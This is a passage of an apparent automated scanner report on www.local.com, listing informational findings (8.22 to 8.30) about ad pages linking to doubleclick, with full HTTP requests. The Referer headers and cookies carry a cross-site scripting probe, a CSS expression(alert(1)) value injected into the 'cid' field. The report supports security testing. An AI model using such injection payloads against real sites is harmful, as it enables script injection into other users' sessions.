Cteonnt-Length: 843
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748882748?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748882748?" border="0" alt="" /></a>
...[SNIP]...

8.22. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=11;tile=11;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748812638?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=11;tile=11;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748812638?

Request

GET /dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Date: Thu, 03 Feb 2011 15:59:57 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=11;tile=11;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748812638?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=11;tile=11;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748812638?" border="0" alt="" /></a>
...[SNIP]...

8.23. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.pp&pos=4&t=4&sz=728x90&ord=1296748870273&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748870273?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748870273?

Request

GET /dart/?ag=True&css=banner&p=locm.pp&pos=4&t=4&sz=728x90&ord=1296748870273&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/equity-bank-63975058/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 843
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748870273?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748870273?" border="0" alt="" /></a>
...[SNIP]...

8.24. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748869864&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748869864?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748869864?

Request

GET /dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748869864&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748869864?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748869864?" border="0" alt="" /></a>
...[SNIP]...

8.25. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&pos=3&t=3&sz=160x600&ord=1296748848750&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=3;tile=3;cat=financial_services;city=dallas_tx;sz=160x600;ord=1296748848750?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=3;tile=3;cat=financial_services;city=dallas_tx;sz=160x600;ord=1296748848750?

Request

GET /dart/?ag=True&p=locm.sp&pos=3&t=3&sz=160x600&ord=1296748848750&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.2.10.1296748820; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Date: Thu, 03 Feb 2011 16:00:27 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=3;tile=3;cat=financial_services;city=dallas_tx;sz=160x600;ord=1296748848750?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=3;tile=3;cat=financial_services;city=dallas_tx;sz=160x600;ord=1296748848750?" border="0" alt="" /></a>
...[SNIP]...

8.26. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1296748848750&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748848750?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748848750?

Request

GET /dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1296748848750&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.2.10.1296748820; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:27 GMT
Connection: close
Content-Length: 975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748848750?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748848750?" border="0" alt="" /></a>
...[SNIP]...

8.27. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748848750&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=11;tile=11;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748848750?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=11;tile=11;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748848750?

Request

GET /dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748848750&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.2.10.1296748820; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:27 GMT
Connection: close
Content-Length: 981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=11;tile=11;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748848750?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=11;tile=11;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748848750?" border="0" alt="" /></a>
...[SNIP]...

8.28. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 978
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 15:59:57 GMT
Connection: close
Content-Length: 978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" border="0" alt="" /></a>
...[SNIP]...

8.29. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&sz=170x150&ord=1296748812638&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=170x150;ord=1296748812638?
http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=170x150;ord=1296748812638?

Request

GET /dart/?ag=True&p=locm.sp&sz=170x150&ord=1296748812638&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Date: Thu, 03 Feb 2011 15:59:57 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=170x150;ord=1296748812638?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=170x150;ord=1296748812638?" border="0" alt="" /></a>
...[SNIP]...

8.30. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&pos=8&t=8&sz=310x101&ord=1296748883062&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748883062?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748883062?

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=8&sz=310x101&ord=1296748883062&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/
